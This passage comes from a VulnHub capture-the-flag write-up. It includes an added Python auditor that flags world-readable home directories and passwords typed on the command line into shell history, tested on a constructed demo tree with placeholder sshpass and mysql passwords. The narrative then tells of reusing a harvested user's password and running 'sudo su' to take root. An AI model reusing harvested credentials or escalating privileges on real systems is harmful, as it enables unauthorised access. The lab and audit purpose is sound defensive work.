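Two weaknesses combined here: every home directory except peter's was readable by other users, and JKanode's history held passwords typed on the command line with `sshpass -p`. Both are easy to audit for. The following is an added example, not from the write-up: it walks a /home tree, reports home directories readable by "other", and scans shell history files for command-line password patterns, reporting the file, line and pattern but never the secret itself. The demo tree it builds is constructed, the placeholder passwords in it are not the VM's, and the pattern list is an assumption to extend.

```python
"""Audit home directories for world-readable permissions and for secrets left
in shell history. Added example, not from the write-up; the demo tree and
the passwords in it are constructed placeholders."""
import os
import re
import stat
import tempfile

HISTORY_FILES = ('.bash_history', '.zsh_history', '.mysql_history')

# Credentials passed on a command line end up in history. Only the label is
# reported, never the matched secret.
SECRET_PATTERNS = (
    ('password passed to sshpass', re.compile(r'\bsshpass\s+-p\s*\S+')),
    ('password passed to mysql', re.compile(r'\bmysql\b.*\s-p\S+')),
    ('password in --password= option', re.compile(r'--password=\S+')),
)


def audit_homes(home_root):
    """Return (user, issue) pairs: homes readable by 'other', and history
    lines that contain a command-line password."""
    findings = []
    for user in sorted(os.listdir(home_root)):
        hdir = os.path.join(home_root, user)
        if not os.path.isdir(hdir):
            continue
        if os.stat(hdir).st_mode & stat.S_IROTH:
            findings.append((user, 'home directory is world-readable'))
        for hist in HISTORY_FILES:
            path = os.path.join(hdir, hist)
            if not os.path.isfile(path):
                continue
            try:
                with open(path, errors='replace') as fh:
                    for lineno, line in enumerate(fh, 1):
                        for label, pat in SECRET_PATTERNS:
                            if pat.search(line):
                                findings.append((user, f'{hist}:{lineno} {label}'))
                                break
            except OSError:
                continue   # unreadable history: nothing to report for this file
    return findings


def make_demo_homes():
    """Constructed /home: JBare is world-readable with passwords in history
    (mirroring what the write-up found), peter is locked down."""
    root = tempfile.mkdtemp(prefix='home-demo-')
    homes = {
        'JBare': (0o755, ['exit', 'sshpass -p EXAMPLE_PW ssh JKanode@localhost',
                          'ps aux', 'mysql -u root -pEXAMPLE_PW', 'mysql -u root -p']),
        'peter': (0o750, ['ls -lah', 'exit']),
    }
    for user, (mode, history) in homes.items():
        hdir = os.path.join(root, user)
        os.mkdir(hdir)
        with open(os.path.join(hdir, '.bash_history'), 'w') as fh:
            fh.write('\n'.join(history) + '\n')
        os.chmod(hdir, mode)
    return root


if __name__ == '__main__':
    for user, issue in audit_homes(make_demo_homes()):
        print(f'{user}: {issue}')
```

Note that `mysql -u root -p` with no inline value is deliberately not flagged, since the client then prompts and nothing is recorded; the fix for the flagged lines is the same as for sshpass, namely keys or a credential file instead of a password argument, plus `chmod 750` (or a `DIR_MODE=0750` default in adduser.conf) on the home directories.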

I am going to try peter's credentials first because he has a stronger password... I would like to believe he is a sudoer at a minimum.

Jackpot... peter has full root access. With a sudo su we get root and claim our flag.

I would like to thank G0tMi1k and Vulnhub and all the testers. This was a very fun VM.